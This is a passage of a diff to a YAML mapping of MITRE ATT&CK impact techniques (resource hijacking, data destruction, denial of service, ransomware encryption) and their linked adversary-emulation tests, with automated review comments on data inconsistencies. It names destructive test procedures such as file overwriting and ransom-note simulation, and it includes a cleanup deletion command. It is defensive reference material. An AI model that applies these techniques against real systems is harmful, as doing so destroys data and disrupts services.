+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
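Review bot: the two new records, `T1496.004` and `T1496.001`, are appended after T1491.001's atomic tests, so the T1496 sub-techniques are spread across three places in the mapping; emitting techniques in id order would keep them adjacent and make future bundle refreshes diff cleanly. Two data nits carried in from upstream, worth noting but not blocking: the T1496.004 description ends with a trailing space inside the quoted scalar (`...otherwise impact availability. "`), which YAML preserves, and the `Sysdig LLMJacking 2024` reference puts the title before the author, unlike every other entry.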
@@ -94910,11 +95889,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -94937,6 +95915,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -94954,9 +95933,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -94982,9 +95962,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests:
- name: Change User Password - Windows
@@ -95166,7 +96145,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -95190,7 +96169,6 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests:
- name: PureLocker Ransom Note
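Review bot: T1486 keeps `x_mitre_attack_spec_version: 2.1.0` and only loses `spec_version: '2.1'`, whereas the refreshed records elsewhere in this diff are bumped to 3.2.0; combined with its `modified` timestamp regressing in the preceding hunk (`2022-11-08` to `2022-06-16`), it looks like the records that carry atomic tests (`identifier` plus a populated `atomic_tests`) were merged from an older bundle than the rest. If that is intentional, say so in the PR; if not, the populated-test records need the same refresh.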
@@ -95322,7 +96300,7 @@ impact:
cleanup_command: "del $env:Userprofile\\Desktop\\akira_readme.txt \ndel c:\\test.*.akira\n"
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -95341,7 +96319,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -95358,18 +96335,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
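Review bot: the platform list for T1499 is shuffled as well as trimmed: `IaaS` is deleted from its old position and re-added after `Containers`, so the hunk shows five removals and one addition for what is really four removals (`Azure AD`, `Office 365`, `SaaS`, `Google Workspace`). Sorting `x_mitre_platforms` on output (or preserving upstream order consistently) would stop pure reorders from showing up as changes and leave only the platform-set changes to review.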
@@ -95393,8 +96365,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -95414,33 +96386,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -95451,7 +96412,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -95468,8 +96429,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -95488,99 +96452,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
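Review bot: `spec_version: '2.1'` is dropped from T1496 and T1565.002 here (and from every other technique block in this patch) while `x_mitre_attack_spec_version` is retained; if that is deliberate, confirm nothing downstream keys on the STIX `spec_version` property, and note the removals are buried inside reorder-only hunks where they are easy to miss in review. The new Sysdig reference also has a stray space in `Targeting GitLab .`, and the unchanged T1565.002 text still reads `opportunity deploy a tool` and `data as at passes over a network`, worth raising upstream while the object is being touched.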
@@ -95589,7 +96527,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -95615,9 +96553,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
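Review bot: the data source added for T1485 is `Cloud Storage: Cloud Storage Modification`, but the description change in the previous hunk is about deleting cloud storage objects, machine images and database instances; unless `Cloud Storage: Cloud Storage Deletion` is already present in the list outside the visible context, deletion events would not be covered by the listed sources. Please confirm the full list rather than only the inserted line.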
@@ -95673,7 +96612,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests:
- name: Windows - Overwrite file with SysInternals SDelete
@@ -95725,50 +96663,7 @@ impact:
name: command_prompt
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -95783,6 +96678,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -95795,16 +96694,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
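Review bot: the T1498 platform list loses Azure AD, Office 365, SaaS and Google Workspace (removed in the earlier hunk) and is rebuilt as Windows, IaaS, Linux, macOS, Containers at version 1.2; unlike T1566.002 and T1078.001 later in this patch, no Identity Provider or Office Suite platform is substituted, so any platform-keyed index derived from this field will silently drop T1498 for identity and SaaS platforms. Confirm this matches upstream intent rather than a merge artefact before the indexes are regenerated.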
@@ -95872,11 +96807,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -95894,7 +96828,7 @@ impact:
